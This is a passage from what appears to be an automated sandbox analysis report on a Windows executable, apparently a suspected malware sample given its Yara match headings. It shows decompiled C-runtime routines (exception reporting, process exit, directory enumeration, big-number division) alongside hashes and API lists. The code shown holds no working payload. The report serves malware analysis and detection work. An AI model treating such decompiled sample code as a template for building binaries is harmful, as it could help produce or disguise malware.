                    					_push(_t67 + 1);
                    					_push(_v92);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				_t68 = _v96;
                    				_v72 = 0xf;
                    				_v76 = 0;
                    				_v92 = 0;
                    				if(_t68 >= 0x10) {
                    					_push(_t68 + 1);
                    					_push(_v116);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				_t85 = _v120;
                    				_v96 = 0xf;
                    				_v100 = 0;
                    				_v116 = 0;
                    				if(_t85 >= 0x10) {
                    					_push(_t85 + 1);
                    					_push(_v140);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				 *_t81 = 0x141dde4;
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t81, _v20 ^ _t103);
                    			}

                    APIs
                    • GetLastError.KERNEL32(00000010,78D9F939,75D701B0,?,00000000,?,?,?,?,?,?,?,?,01417CB6,000000FF), ref: 013EA171
                      • Part of subcall function 013C1E24: __EH_prolog3.LIBCMT ref: 013C1E2B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ErrorH_prolog3Last
                    • String ID: operation failed with error $OS_Rng:
                    • API String ID: 685212868-700108173
                    • Opcode ID: 4d23377c1e26ec8fe09d7627f60c3a072b43694caf525927b2b3006963483491
                    • Instruction ID: 597aae3b56e524ebb0a2cd676a1363043d8abb868c07e10a19ad59aab30763e6
                    • Opcode Fuzzy Hash: 4d23377c1e26ec8fe09d7627f60c3a072b43694caf525927b2b3006963483491
                    • Instruction Fuzzy Hash: 24518DB1D00259DBEF15DFA8CC48BEEBBB8FB15318F20415DE411AB281DB755A49CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E013FD897(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				char _v0;
                    				signed int _v8;
                    				intOrPtr _v524;
                    				intOrPtr _v528;
                    				void* _v532;
                    				intOrPtr _v536;
                    				char _v540;
                    				intOrPtr _v544;
                    				intOrPtr _v548;
                    				intOrPtr _v552;
                    				intOrPtr _v556;
                    				intOrPtr _v560;
                    				intOrPtr _v564;
                    				intOrPtr _v568;
                    				intOrPtr _v572;
                    				intOrPtr _v576;
                    				intOrPtr _v580;
                    				intOrPtr _v584;
                    				char _v724;
                    				intOrPtr _v792;
                    				intOrPtr _v800;
                    				char _v804;
                    				struct _EXCEPTION_POINTERS _v812;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t40;
                    				char* _t47;
                    				char* _t49;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				int _t67;
                    				intOrPtr _t68;
                    				signed int _t69;
                    
                    				_t68 = __esi;
                    				_t65 = __edx;
                    				_t60 = __ebx;
                    				_t40 =  *0x1435234; // 0x78d9f939
                    				_t41 = _t40 ^ _t69;
                    				_v8 = _t40 ^ _t69;
                    				if(_a4 != 0xffffffff) {
                    					_push(_a4);
                    					E013F3657(_t41);
                    					_pop(_t61);
                    				}
                    				E013F5890(_t66,  &_v804, 0, 0x50);
                    				E013F5890(_t66,  &_v724, 0, 0x2cc);
                    				_v812.ExceptionRecord =  &_v804;
                    				_t47 =  &_v724;
                    				_v812.ContextRecord = _t47;
                    				_v548 = _t47;
                    				_v552 = _t61;
                    				_v556 = _t65;
                    				_v560 = _t60;
                    				_v564 = _t68;
                    				_v568 = _t66;
                    				_v524 = ss;
                    				_v536 = cs;
                    				_v572 = ds;
                    				_v576 = es;
                    				_v580 = fs;
                    				_v584 = gs;
                    				asm("pushfd");
                    				_pop( *_t22);
                    				_v540 = _v0;
                    				_t49 =  &_v0;
                    				_v528 = _t49;
                    				_v724 = 0x10001;
                    				_v544 =  *((intOrPtr*)(_t49 - 4));
                    				_v804 = _a8;
                    				_v800 = _a12;
                    				_v792 = _v0;
                    				_t67 = IsDebuggerPresent();
                    				SetUnhandledExceptionFilter(0);
                    				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                    					_push(_a4);
                    					_t57 = E013F3657(_t57);
                    				}
                    				return E013F268B(_t57, _v8 ^ _t69);
                    			}

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 013FD98F
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013FD999
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 013FD9A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 7f091010b74c3cbd4527a06b9fe54ab42289570ea17a094a68aaf687d0eb76a9
                    • Instruction ID: 132dc47c7e20b32d7bab78833531d6c7a7e0959f4f84994b74ecd939adcba83d
                    • Opcode Fuzzy Hash: 7f091010b74c3cbd4527a06b9fe54ab42289570ea17a094a68aaf687d0eb76a9
                    • Instruction Fuzzy Hash: 4131D47590122DABCB21DF68D988BDDBBB8BF18314F5041EAE91CA7250E7709B858F44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E014034C6(int _a4) {
                    				void* _t14;
                    
                    				if(E0140733A(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                    					TerminateProcess(GetCurrentProcess(), _a4);
                    				}
                    				E01403507(_t14, _a4);
                    				ExitProcess(_a4);
                    			}

                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0140349C,?), ref: 014034E7
                    • TerminateProcess.KERNEL32(00000000,?,0140349C,?), ref: 014034EE
                    • ExitProcess.KERNEL32 ref: 01403500
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: ab8af0de4366184ba7a4ba2bed28e16c92d1f28d855caa63ace303502ccbb82f
                    • Instruction ID: 4be152de93e9da65aa14df032f9ea717379ee3a554f41b8a39d3037eadd9ae66
                    • Opcode Fuzzy Hash: ab8af0de4366184ba7a4ba2bed28e16c92d1f28d855caa63ace303502ccbb82f
                    • Instruction Fuzzy Hash: 62E0EC35001288AFCF236F5ADA09A5A7F69FF64285F154039FD458B272CF36E942DB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E0140C916(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				signed int _v12;
                    				intOrPtr* _v32;
                    				CHAR* _v36;
                    				signed int _v48;
                    				char _v286;
                    				signed int _v287;
                    				struct _WIN32_FIND_DATAA _v332;
                    				intOrPtr* _v336;
                    				signed int _v340;
                    				signed int _v344;
                    				intOrPtr _v372;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t35;
                    				signed int _t40;
                    				signed int _t43;
                    				intOrPtr _t45;
                    				signed char _t47;
                    				intOrPtr* _t55;
                    				union _FINDEX_INFO_LEVELS _t57;
                    				union _FINDEX_INFO_LEVELS _t58;
                    				signed int _t62;
                    				signed int _t65;
                    				void* _t71;
                    				void* _t73;
                    				signed int _t74;
                    				void* _t77;
                    				CHAR* _t78;
                    				intOrPtr* _t82;
                    				intOrPtr _t84;
                    				void* _t86;
                    				intOrPtr* _t87;
                    				signed int _t91;
                    				signed int _t95;
                    				void* _t100;
                    				intOrPtr _t101;
                    				signed int _t104;
                    				union _FINDEX_INFO_LEVELS _t105;
                    				void* _t109;
                    				void* _t110;
                    				intOrPtr _t111;
                    				void* _t112;
                    				signed int _t117;
                    				void* _t118;
                    				signed int _t119;
                    				void* _t120;
                    				void* _t121;
                    
                    				_push(__ecx);
                    				_t82 = _a4;
                    				_t2 = _t82 + 1; // 0x1
                    				_t100 = _t2;
                    				do {
                    					_t35 =  *_t82;
                    					_t82 = _t82 + 1;
                    				} while (_t35 != 0);
                    				_t104 = _a12;
                    				_t84 = _t82 - _t100 + 1;
                    				_v8 = _t84;
                    				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
                    					_t5 = _t104 + 1; // 0x1
                    					_t77 = _t5 + _t84;
                    					_t110 = E014009B2(_t84, _t77, 1);
                    					_t86 = _t109;
                    					__eflags = _t104;
                    					if(_t104 == 0) {
                    						L6:
                    						_push(_v8);
                    						_t77 = _t77 - _t104;
                    						_t40 = E01411431(_t86, _t110 + _t104, _t77, _a4);
                    						_t119 = _t118 + 0x10;
                    						__eflags = _t40;
                    						if(__eflags != 0) {
                    							goto L9;
                    						} else {
                    							_t71 = E0140CB55(_a16, __eflags, _t110);
                    							E014012E1(0);
                    							_t73 = _t71;
                    							goto L8;
                    						}
                    					} else {
                    						_push(_t104);
                    						_t74 = E01411431(_t86, _t110, _t77, _a8);
                    						_t119 = _t118 + 0x10;
                    						__eflags = _t74;
                    						if(_t74 != 0) {
                    							L9:
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							E013FDA8E();
                    							asm("int3");
                    							_t117 = _t119;
                    							_t120 = _t119 - 0x150;
                    							_t43 =  *0x1435234; // 0x78d9f939
                    							_v48 = _t43 ^ _t117;
                    							_t87 = _v32;
                    							_push(_t77);
                    							_t78 = _v36;
                    							_push(_t110);
                    							_t111 = _v332.cAlternateFileName;
                    							_push(_t104);
                    							_v372 = _t111;
                    							while(1) {
                    								__eflags = _t87 - _t78;
                    								if(_t87 == _t78) {
                    									break;
                    								}
                    								_t45 =  *_t87;
                    								__eflags = _t45 - 0x2f;
                    								if(_t45 != 0x2f) {
                    									__eflags = _t45 - 0x5c;
                    									if(_t45 != 0x5c) {
                    										__eflags = _t45 - 0x3a;
                    										if(_t45 != 0x3a) {
                    											_t87 = E01414060(_t78, _t87);
                    											continue;
                    										}
                    									}
                    								}
                    								break;
                    							}
                    							_t101 =  *_t87;
                    							__eflags = _t101 - 0x3a;
                    							if(_t101 != 0x3a) {
                    								L19:
                    								_t105 = 0;
                    								__eflags = _t101 - 0x2f;
                    								if(_t101 == 0x2f) {
                    									L23:
                    									_t47 = 1;
                    									__eflags = 1;
                    								} else {
                    									__eflags = _t101 - 0x5c;
                    									if(_t101 == 0x5c) {
                    										goto L23;
                    									} else {
                    										__eflags = _t101 - 0x3a;
                    										if(_t101 == 0x3a) {
                    											goto L23;
                    										} else {
                    											_t47 = 0;
                    										}
                    									}
                    								}
                    								_t89 = _t87 - _t78 + 1;
                    								asm("sbb eax, eax");
                    								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
                    								E013F5890(_t105,  &_v332, _t105, 0x140);
                    								_t121 = _t120 + 0xc;
                    								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
                    								_t55 = _v336;
                    								__eflags = _t112 - 0xffffffff;
                    								if(_t112 != 0xffffffff) {
                    									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                    									__eflags = _t91;
                    									_t92 = _t91 >> 2;
                    									_v344 = _t91 >> 2;
                    									do {
                    										__eflags = _v332.cFileName - 0x2e;
                    										if(_v332.cFileName != 0x2e) {
                    											L36:
                    											_push(_t55);
                    											_t57 = E0140C916(_t92,  &(_v332.cFileName), _t78, _v340);
                    											_t121 = _t121 + 0x10;
                    											__eflags = _t57;
                    											if(_t57 != 0) {
                    												goto L26;
                    											} else {
                    												goto L37;
                    											}
                    										} else {
                    											_t92 = _v287;
                    											__eflags = _t92;
                    											if(_t92 == 0) {
                    												goto L37;
                    											} else {
                    												__eflags = _t92 - 0x2e;
                    												if(_t92 != 0x2e) {
                    													goto L36;
                    												} else {
                    													__eflags = _v286;
                    													if(_v286 == 0) {
                    														goto L37;
                    													} else {
                    														goto L36;
                    													}
                    												}
                    											}
                    										}
                    										goto L40;
                    										L37:
                    										_t62 = FindNextFileA(_t112,  &_v332);
                    										__eflags = _t62;
                    										_t55 = _v336;
                    									} while (_t62 != 0);
                    									_t102 =  *_t55;
                    									_t95 = _v344;
                    									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                    									__eflags = _t95 - _t65;
                    									if(_t95 != _t65) {
                    										E01413C80(_t102 + _t95 * 4, _t65 - _t95, 4, E0140C76E);
                    									}
                    								} else {
                    									_push(_t55);
                    									_t57 = E0140C916(_t89, _t78, _t105, _t105);
                    									L26:
                    									_t105 = _t57;
                    								}
                    								__eflags = _t112 - 0xffffffff;
                    								if(_t112 != 0xffffffff) {
                    									FindClose(_t112);
                    								}
                    								_t58 = _t105;
                    							} else {
                    								__eflags = _t87 -  &(_t78[1]);
                    								if(_t87 ==  &(_t78[1])) {
                    									goto L19;
                    								} else {
                    									_push(_t111);
                    									_t58 = E0140C916(_t87, _t78, 0, 0);
                    								}
                    							}
                    							__eflags = _v12 ^ _t117;
                    							return E013F268B(_t58, _v12 ^ _t117);
                    						} else {
                    							goto L6;
                    						}
                    					}
                    				} else {
                    					_t73 = 0xc;
                    					L8:
                    					return _t73;
                    				}
                    				L40:
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: b7b08b8f7314b4f49605c3e3e16d56d7951e718eaa1b025902e034a1031d75b9
                    • Instruction ID: 1be8a120479a2aa83fea951c65dc48b1642938e7b9a9406bef90b768c80f1e07
                    • Opcode Fuzzy Hash: b7b08b8f7314b4f49605c3e3e16d56d7951e718eaa1b025902e034a1031d75b9
                    • Instruction Fuzzy Hash: C3310871900209AFDB258E7ECCC4EFB7B7DEB85314F1402E9E559D72A1E63099458B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,01404B35,?,00000004), ref: 01407021
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: e5557dcc7563f80de9dc186e89848d7eaf750e31675b2b36622bcd2887e3465c
                    • Instruction ID: 0c01209a0e3239756c49094cbb84630d74f77c0fa8e0dcb1adea8f6c5690858f
                    • Opcode Fuzzy Hash: e5557dcc7563f80de9dc186e89848d7eaf750e31675b2b36622bcd2887e3465c
                    • Instruction Fuzzy Hash: 13F0F631A41218BBCB22AF62CC05E7E7F20DF18711F10011EFD05562A0CA71991197D5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01407077
                    Strings
                    • GetSystemTimePreciseAsFileTime, xrefs: 01407053
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID: GetSystemTimePreciseAsFileTime
                    • API String ID: 2086374402-595813830
                    • Opcode ID: e35e95e477c378008cc0673f4cee91a28eea3409cd56183e11d139fcba7cb5c7
                    • Instruction ID: 7004cb51e07bfee1660cdc4bc0c0fb2980520015c20fb011b8c9500fdf586f85
                    • Opcode Fuzzy Hash: e35e95e477c378008cc0673f4cee91a28eea3409cd56183e11d139fcba7cb5c7
                    • Instruction Fuzzy Hash: 2BE05570B82228BBD322AF268C05CBE7B60CF24A11B21026EFC064B2A0CA315D00C6C6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E01401420(signed int* _a4, signed int* _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				signed int* _v80;
                    				char _v540;
                    				signed int _v544;
                    				signed int _t197;
                    				signed int _t198;
                    				signed int* _t200;
                    				signed int _t201;
                    				signed int _t204;
                    				signed int _t206;
                    				signed int _t208;
                    				signed int _t209;
                    				signed int _t213;
                    				signed int _t219;
                    				intOrPtr _t225;
                    				void* _t228;
                    				signed int _t230;
                    				signed int _t247;
                    				signed int _t250;
                    				void* _t253;
                    				signed int _t256;
                    				signed int* _t262;
                    				signed int _t263;
                    				signed int _t264;
                    				void* _t265;
                    				intOrPtr* _t266;
                    				signed int _t267;
                    				signed int _t269;
                    				signed int _t270;
                    				signed int _t271;
                    				signed int _t272;
                    				signed int* _t274;
                    				signed int* _t278;
                    				signed int _t279;
                    				signed int _t280;
                    				intOrPtr _t282;
                    				void* _t286;
                    				signed char _t292;
                    				signed int _t295;
                    				signed int _t303;
                    				signed int _t306;
                    				signed int _t307;
                    				signed int _t309;
                    				signed int _t311;
                    				signed int _t313;
                    				intOrPtr* _t314;
                    				signed int _t318;
                    				signed int _t322;
                    				signed int* _t328;
                    				signed int _t330;
                    				signed int _t331;
                    				signed int _t333;
                    				void* _t334;
                    				signed int _t336;
                    				signed int _t338;
                    				signed int _t341;
                    				signed int _t342;
                    				signed int* _t344;
                    				signed int _t349;
                    				signed int _t351;
                    				void* _t355;
                    				signed int _t359;
                    				signed int _t360;
                    				signed int _t362;
                    				signed int* _t368;
                    				signed int* _t369;
                    				signed int* _t370;
                    				signed int* _t373;
                    
                    				_t262 = _a4;
                    				_t197 =  *_t262;
                    				if(_t197 != 0) {
                    					_t328 = _a8;
                    					_t267 =  *_t328;
                    					__eflags = _t267;
                    					if(_t267 != 0) {
                    						_t3 = _t197 - 1; // -1
                    						_t349 = _t3;
                    						_t4 = _t267 - 1; // -1
                    						_t198 = _t4;
                    						_v16 = _t349;
                    						__eflags = _t198;
                    						if(_t198 != 0) {
                    							__eflags = _t198 - _t349;
                    							if(_t198 > _t349) {
                    								L23:
                    								__eflags = 0;
                    								return 0;
                    							} else {
                    								_t46 = _t198 + 1; // 0x0
                    								_t306 = _t349 - _t198;
                    								_v60 = _t46;
                    								_t269 = _t349;
                    								__eflags = _t349 - _t306;
                    								if(_t349 < _t306) {
                    									L21:
                    									_t306 = _t306 + 1;
                    									__eflags = _t306;
                    								} else {
                    									_t368 =  &(_t262[_t349 + 1]);
                    									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                    									__eflags = _t341;
                    									while(1) {
                    										__eflags =  *_t341 -  *_t368;
                    										if( *_t341 !=  *_t368) {
                    											break;
                    										}
                    										_t269 = _t269 - 1;
                    										_t341 = _t341 - 4;
                    										_t368 = _t368 - 4;
                    										__eflags = _t269 - _t306;
                    										if(_t269 >= _t306) {
                    											continue;
                    										} else {
                    											goto L21;
                    										}
                    										goto L22;
                    									}
                    									_t369 = _a8;
                    									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                    									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                    									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                    										goto L21;
                    									}
                    								}
                    								L22:
                    								__eflags = _t306;
                    								if(__eflags != 0) {
                    									_t330 = _v60;
                    									_t200 = _a8;
                    									_t351 =  *(_t200 + _t330 * 4);
                    									_t64 = _t330 * 4; // 0xfffedd04
                    									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                    									_v36 = _t201;
                    									asm("bsr eax, esi");
                    									_v56 = _t351;
                    									if(__eflags == 0) {
                    										_t270 = 0x20;
                    									} else {
                    										_t270 = 0x1f - _t201;
                    									}
                    									_v40 = _t270;
                    									_v64 = 0x20 - _t270;
                    									__eflags = _t270;
                    									if(_t270 != 0) {
                    										_t292 = _v40;
                    										_v36 = _v36 << _t292;
                    										_v56 = _t351 << _t292 | _v36 >> _v64;
                    										__eflags = _t330 - 2;
                    										if(_t330 > 2) {
                    											_t79 = _t330 * 4; // 0xe850ffff
                    											_t81 =  &_v36;
                    											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                    											__eflags =  *_t81;
                    										}
                    									}
                    									_v76 = 0;
                    									_t307 = _t306 + 0xffffffff;
                    									__eflags = _t307;
                    									_v32 = _t307;
                    									if(_t307 < 0) {
                    										_t331 = 0;
                    										__eflags = 0;
                    									} else {
                    										_t85 =  &(_t262[1]); // 0x4
                    										_v20 =  &(_t85[_t307]);
                    										_t206 = _t307 + _t330;
                    										_t90 = _t262 - 4; // -4
                    										_v12 = _t206;
                    										_t278 = _t90 + _t206 * 4;
                    										_v80 = _t278;
                    										do {
                    											__eflags = _t206 - _v16;
                    											if(_t206 > _v16) {
                    												_t207 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t207 = _t278[2];
                    											}
                    											__eflags = _v40;
                    											_t311 = _t278[1];
                    											_t279 =  *_t278;
                    											_v52 = _t207;
                    											_v44 = 0;
                    											_v8 = _t207;
                    											_v24 = _t279;
                    											if(_v40 > 0) {
                    												_t318 = _v8;
                    												_t336 = _t279 >> _v64;
                    												_t230 = E013F30E0(_t311, _v40, _t318);
                    												_t279 = _v40;
                    												_t207 = _t318;
                    												_t311 = _t336 | _t230;
                    												_t359 = _v24 << _t279;
                    												__eflags = _v12 - 3;
                    												_v8 = _t318;
                    												_v24 = _t359;
                    												if(_v12 >= 3) {
                    													_t279 = _v64;
                    													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                    													__eflags = _t360;
                    													_t207 = _v8;
                    													_v24 = _t360;
                    												}
                    											}
                    											_t208 = E013F3170(_t311, _t207, _v56, 0);
                    											_v44 = _t262;
                    											_t263 = _t208;
                    											_v44 = 0;
                    											_t209 = _t311;
                    											_v8 = _t263;
                    											_v28 = _t209;
                    											_t333 = _t279;
                    											_v72 = _t263;
                    											_v68 = _t209;
                    											__eflags = _t209;
                    											if(_t209 != 0) {
                    												L40:
                    												_t264 = _t263 + 1;
                    												asm("adc eax, 0xffffffff");
                    												_t333 = _t333 + E013F2820(_t264, _t209, _v56, 0);
                    												asm("adc esi, edx");
                    												_t263 = _t264 | 0xffffffff;
                    												_t209 = 0;
                    												__eflags = 0;
                    												_v44 = 0;
                    												_v8 = _t263;
                    												_v72 = _t263;
                    												_v28 = 0;
                    												_v68 = 0;
                    											} else {
                    												__eflags = _t263 - 0xffffffff;
                    												if(_t263 > 0xffffffff) {
                    													goto L40;
                    												}
                    											}
                    											__eflags = 0;
                    											if(0 <= 0) {
                    												if(0 < 0) {
                    													goto L44;
                    												} else {
                    													__eflags = _t333 - 0xffffffff;
                    													if(_t333 <= 0xffffffff) {
                    														while(1) {
                    															L44:
                    															_v8 = _v24;
                    															_t228 = E013F2820(_v36, 0, _t263, _t209);
                    															__eflags = _t311 - _t333;
                    															if(__eflags < 0) {
                    																break;
                    															}
                    															if(__eflags > 0) {
                    																L47:
                    																_t209 = _v28;
                    																_t263 = _t263 + 0xffffffff;
                    																_v72 = _t263;
                    																asm("adc eax, 0xffffffff");
                    																_t333 = _t333 + _v56;
                    																__eflags = _t333;
                    																_v28 = _t209;
                    																asm("adc dword [ebp-0x28], 0x0");
                    																_v68 = _t209;
                    																if(_t333 == 0) {
                    																	__eflags = _t333 - 0xffffffff;
                    																	if(_t333 <= 0xffffffff) {
                    																		continue;
                    																	} else {
                    																	}
                    																}
                    															} else {
                    																__eflags = _t228 - _v8;
                    																if(_t228 <= _v8) {
                    																	break;
                    																} else {
                    																	goto L47;
                    																}
                    															}
                    															L51:
                    															_v8 = _t263;
                    															goto L52;
                    														}
                    														_t209 = _v28;
                    														goto L51;
                    													}
                    												}
                    											}
                    											L52:
                    											__eflags = _t209;
                    											if(_t209 != 0) {
                    												L54:
                    												_t280 = _v60;
                    												_t334 = 0;
                    												_t355 = 0;
                    												__eflags = _t280;
                    												if(_t280 != 0) {
                    													_t266 = _v20;
                    													_t219 =  &(_a8[1]);
                    													__eflags = _t219;
                    													_v24 = _t219;
                    													_v16 = _t280;
                    													do {
                    														_v44 =  *_t219;
                    														_t225 =  *_t266;
                    														_t286 = _t334 + _v72 * _v44;
                    														asm("adc esi, edx");
                    														_t334 = _t355;
                    														_t355 = 0;
                    														__eflags = _t225 - _t286;
                    														if(_t225 < _t286) {
                    															_t334 = _t334 + 1;
                    															asm("adc esi, esi");
                    														}
                    														 *_t266 = _t225 - _t286;
                    														_t266 = _t266 + 4;
                    														_t219 = _v24 + 4;
                    														_t164 =  &_v16;
                    														 *_t164 = _v16 - 1;
                    														__eflags =  *_t164;
                    														_v24 = _t219;
                    													} while ( *_t164 != 0);
                    													_t263 = _v8;
                    													_t280 = _v60;
                    												}
                    												__eflags = 0 - _t355;
                    												if(__eflags <= 0) {
                    													if(__eflags < 0) {
                    														L63:
                    														__eflags = _t280;
                    														if(_t280 != 0) {
                    															_t338 = _t280;
                    															_t314 = _v20;
                    															_t362 =  &(_a8[1]);
                    															__eflags = _t362;
                    															_t265 = 0;
                    															do {
                    																_t282 =  *_t314;
                    																_t172 = _t362 + 4; // 0xa6a5959
                    																_t362 = _t172;
                    																_t314 = _t314 + 4;
                    																asm("adc eax, eax");
                    																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                    																asm("adc eax, 0x0");
                    																_t265 = 0;
                    																_t338 = _t338 - 1;
                    																__eflags = _t338;
                    															} while (_t338 != 0);
                    															_t263 = _v8;
                    														}
                    														_t263 = _t263 + 0xffffffff;
                    														asm("adc dword [ebp-0x18], 0xffffffff");
                    													} else {
                    														__eflags = _v52 - _t334;
                    														if(_v52 < _t334) {
                    															goto L63;
                    														}
                    													}
                    												}
                    												_t213 = _v12 - 1;
                    												__eflags = _t213;
                    												_v16 = _t213;
                    											} else {
                    												__eflags = _t263;
                    												if(_t263 != 0) {
                    													goto L54;
                    												}
                    											}
                    											_t331 = 0 + _t263;
                    											asm("adc esi, 0x0");
                    											_v20 = _v20 - 4;
                    											_t313 = _v32 - 1;
                    											_t262 = _a4;
                    											_t278 = _v80 - 4;
                    											_t206 = _v12 - 1;
                    											_v76 = _t331;
                    											_v32 = _t313;
                    											_v80 = _t278;
                    											_v12 = _t206;
                    											__eflags = _t313;
                    										} while (_t313 >= 0);
                    									}
                    									_t309 = _v16 + 1;
                    									_t204 = _t309;
                    									__eflags = _t204 -  *_t262;
                    									if(_t204 <  *_t262) {
                    										_t191 = _t204 + 1; // 0x141371e
                    										_t274 =  &(_t262[_t191]);
                    										do {
                    											 *_t274 = 0;
                    											_t194 =  &(_t274[1]); // 0x91850fc2
                    											_t274 = _t194;
                    											_t204 = _t204 + 1;
                    											__eflags = _t204 -  *_t262;
                    										} while (_t204 <  *_t262);
                    									}
                    									 *_t262 = _t309;
                    									__eflags = _t309;
                    									if(_t309 != 0) {
                    										while(1) {
                    											_t271 =  *_t262;
                    											__eflags = _t262[_t271];
                    											if(_t262[_t271] != 0) {
                    												goto L78;
                    											}
                    											_t272 = _t271 + 0xffffffff;
                    											__eflags = _t272;
                    											 *_t262 = _t272;
                    											if(_t272 != 0) {
                    												continue;
                    											}
                    											goto L78;
                    										}
                    									}
                    									L78:
                    									return _t331;
                    								} else {
                    									goto L23;
                    								}
                    							}
                    						} else {
                    							_t6 =  &(_t328[1]); // 0xfc23b5a
                    							_t295 =  *_t6;
                    							_v44 = _t295;
                    							__eflags = _t295 - 1;
                    							if(_t295 != 1) {
                    								__eflags = _t349;
                    								if(_t349 != 0) {
                    									_t342 = 0;
                    									_v12 = 0;
